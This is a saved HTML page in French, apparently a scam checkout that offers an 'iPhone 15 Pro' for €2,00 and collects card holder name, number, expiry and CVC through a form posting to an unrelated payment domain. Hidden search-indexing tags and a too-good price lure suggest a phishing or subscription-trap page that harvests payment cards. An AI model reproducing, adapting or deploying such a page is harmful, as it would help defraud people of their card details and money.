<html lang="fr" dir="ltr"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="robots" content="noindex, nofollow, noarchive">

    <title>Paiement sécurisé</title>

            <style>
        
    </style>
        <title>iPhone 15 Pro</title>

	<!--------------- META TAG START HERE --------------->
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0,user-scalable=0">
	<!--------------- META TAG END'S HERE --------------->

	<!-- FAVICON -->
	<link href="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/images/favicon.png" rel="shortcut icon" type="image/x-icon">

	<!-- LOCAL STYLE -->
	<link rel="stylesheet" href="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/css/style.css">

	<script>
		function __RB_showTerms() {
			document.getElementById('showPopupTerms').style.display = 'block';
		}
	</script>

	<style>
	    html[lang="ar"] body {
            direction: unset !important;
        }

        html[lang="ar"] body input,
        html[lang="ar"] body textarea,
        html[lang="ar"] body select {
            direction: unset !important;
        }
        
        html[lang="ar"] .chip_wrapper p,
        html[lang="ar"] .gigabytes_wrapper p,
        html[lang="ar"] .battery_wrapper p{
            text-align: right;
        }
	
		.total-price {
			display: none;
		}
		
		.page-checkout .images_wrapper,
		.page-checkout .choose_color,
		.page-checkout .btn-group {
		    display: none !important;
		}
		
		.page-checkout .product_wrapper .product_block {
		    justify-content: center;
		}
		
		.product_wrapper .form-control {
		    color: #ffffff !important;
		}
		
		.product_wrapper .product_block .images_wrapper .price_block span {
		    text-align: center;
		}
	</style>
	
	<style>
	    .topbar {
	        display: none;
	    }
	    .product_wrapper .product_block .form_wrapper .form_block .form-group select {
	        color: #fff !important;
	    }
	</style>

	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.2.2/css/bootstrap-grid.min.css" integrity="sha512-a+PObWRxNVh4HZR9wijCGj84JgJ/QhZ8dET09REfYz2clUBjKYhGbOmdy9KEHilYKgbMSIHNQEsonv/r75mHXw==" crossorigin="anonymous" referrerpolicy="no-referrer">
    <link rel="stylesheet" href="/assets/css/styles.css?id=ec1da90a897fb34a69dc780da09ec7e9">
    <style>
        html[lang="fr"] body {
            direction: ltr;
        }

        html[lang="fr"] body input,
        html[lang="fr"] body textarea,
        html[lang="fr"] body select {
            direction: ltr;
        }
    </style>
<style></style></head>
<body class="lang-fr page-payment page-checkout">
        

	<!-- SECTION START HERE -->
	<section>

		<!-- PRODUCT BLOCK START HERE -->
		<div class="product_wrapper animate">
			<div class="container"> <!-- CONTAINER START -->
				<div class="product_block" style="min-height: 180px;">
					<!-- LEFT SIDE BLOCK START HERE -->
					<div class="images_wrapper">
						<div class="price_block">
							<span>Seulement maintenant</span>
							<h2>€2,00</h2>
						</div>
						<div id="black" class="img-tab active">
							<img src="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/images/airpods-iphone-15-pro-blacktitanium1.png" alt="iPhone 15">
						</div>
						<div id="blue" class="img-tab">
							<img src="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/images/airpods-iphone-15-pro-bluetitanium1.png" alt="iPhone 15">
						</div>
						<div id="natural" class="img-tab">
							<img src="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/images/airpods-iphone-15-pro-naturaltitanium1.png" alt="iPhone 15">
						</div>
						<div id="white" class="img-tab">
							<img src="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/images/airpods-iphone-15-pro-whitetitanium1.png" alt="iPhone 15">
						</div>

						<!-- IF YOU ADD MORE DIV(IMAGES) HERE THAN YOU WANT TO CREATE  -->
					</div>
					<!-- LEFT SIDE BLOCK START HERE -->

					<!-- RIGHT SIDE BLOCK START HERE -->
					<div class="form_wrapper">
						<div class="product_title">
							<h1>iPhone 15 Pro</h1>
						</div>
						<!-- FORM BLOCK START HERE -->
						<div class="form_block" id="Scroll_form">
							<div class="row">
								<div class="col-12">
									<div class="title">
										<label>Entrez vos informations</label>
									</div>
								</div>
							</div>
							<!-- RADIO BUTTON BLOCK START -->
							<div class="row">
								<div class="col-12">
									<div class="title choose_color">
										<label>Choisissez votre couleur&nbsp;:</label>
									</div>
									<div class="btn-group">
										<a href="javascript:;" data-tab="black" class="img-nav-tab black active">
											<input type="radio" name="color" id="black">
										</a>
										<a href="javascript:;" data-tab="blue" class="img-nav-tab blue">
											<input type="radio" name="color" id="blue">
										</a>
										<a href="javascript:;" data-tab="natural" class="img-nav-tab natural">
											<input type="radio" name="color" id="natural">
										</a>
										<a href="javascript:;" data-tab="white" class="img-nav-tab white">
											<input type="radio" name="color" id="white">
										</a>
									</div>
								</div>
							</div>
							<input id="required-text" type="hidden" value="Ce champ est requis.">
                            <input id="email-error-text" type="hidden" value="Veuillez entrer une adresse e-mail valide.">
                            
							<div>
                
            <form id="paymentForm" onsubmit="return handleSubmit(event)" action="https://payment.ebizzseminar.com/payment/ho7iaVV2jMoZ2zX55h5038w5gBYaaPHe" method="POST" name="paymentForm" novalidate="novalidate">
    <input type="hidden" name="_token" value="3Z1GRlfoa9oOtvkNzkqR2CofNZN9eqpqbSjkyzzl" autocomplete="off">                                                   
    <div class="accepted-credit-cards" style="text-align: center;margin: 1rem 0;">
        <p class="accepted-credit-cards-heading" style="font-size: 14px;margin: 0 0 .5rem;">Cartes de crédit acceptées:</p>
        <img src="https://cdn.soopercdn.com/cp/form-campaign-checkout-v2/assets/images/card.svg" alt="Supported Payment Cards" style="width:auto;max-width:100%;">
    </div>
    <div class="card-holder form-group">
        <label for="card_holder">Titulaire de la carte</label>
        <div class="controls">
            <input type="text" name="card_holder" id="card_holder" autocomplete="cc-name" placeholder="Titulaire de la carte" required="" class="form-control form-control-lg jp-card-valid valid" style="width:100%;" aria-invalid="false">
        </div>
    </div>
    <div class="card-number form-group">
        <label for="card_number">Numéro de la carte</label>
        <div class="controls">
            <input type="tel" name="card_number" id="card_number" autocomplete="cc-number" placeholder="0000 0000 0000 0000" required="" class="form-control form-control-lg jp-card-invalid" style="width:100%;">
        </div>
    </div>
    <div class="expiry-date form-group">
        <label for="expiry_date">Date d'expiration</label>
        <div class="controls">
            <input type="tel" name="expiry_date" id="expiry_date" autocomplete="cc-exp" placeholder="MM / AA" required="" class="form-control form-control-lg jp-card-invalid" style="width:100%;">
        </div>
    </div>
    <div class="row">
        <div class="col-sm-6 col-9">
            <div class="cvv form-group">
                <label for="cvv">CVC/CVV</label>
                <div class="controls">
                    <input type="number" name="cvv" id="cvv" autocomplete="cc-csc" min="0" max="9999" pattern="^[0-9]{3,4}$" placeholder="CVC/CVV" required="" style="width:100%;" class="form-control form-control-lg jp-card-invalid">
                </div>
            </div>
        </div>
        <div class="col-sm-6 col-3 align-self-center">
            <div class="cvv-helper form-group">
                <img width="50" src="https://cdn.soopercdn.com/cp/checkout/assets/images/cvv.svg" alt="" style="max-width: 100%;max-height: 30px;width: auto !important;">
            </div>
        </div>
    </div>
    <button type="submit" id="submitButton" class="btn btn-success btn-lg" style="width:100%;">
        <span class="loader" style="height:12px;width:12px;border-width:3px;margin-right:5px;display:none;"></span>
        <span class="submit-label">Effectuer Paiement</span>
        <span class="waiting-label" style="display:none;">Effectuer Paiement</span>
    </button>
</form>


	<!-- SECTION END'S HERE -->

	<!-- FOOTER START HERE -->
	<footer>
		<div class="container">
			<div class="block-reassurance">
				<div class="row">
					<div class="col-12">
						<h6>Cartes de crédit acceptées:</h6>
						<img src="https://cdn.soopercdn.com/cp/iphone-15-pro/assets/images/card-logo.svg" alt="Cards" width="317" height="54">
					</div>
				</div>
			</div>
			
		</div>
	</footer>
	<!-- FOOTER END HERE -->


<div id="veepn-guard-alert"></div><style>@font-face{font-family:FigtreeVF;src:url(chrome-extension://majdfhpaihoncoakbjgbdhglocklcgno/fonts/FigtreeVF.woff2) format("woff2 supports variations"),url(chrome-extension://majdfhpaihoncoakbjgbdhglocklcgno/fonts/FigtreeVF.woff2) format("woff2-variations");font-weight:100 1000;font-display:swap}</style><div id="veepn-breach-alert"></div><style>@font-face{font-family:FigtreeVF;src:url(chrome-extension://majdfhpaihoncoakbjgbdhglocklcgno/fonts/FigtreeVF.woff2) format("woff2 supports variations"),url(chrome-extension://majdfhpaihoncoakbjgbdhglocklcgno/fonts/FigtreeVF.woff2) format("woff2-variations");font-weight:100 1000;font-display:swap}</style></body></html>
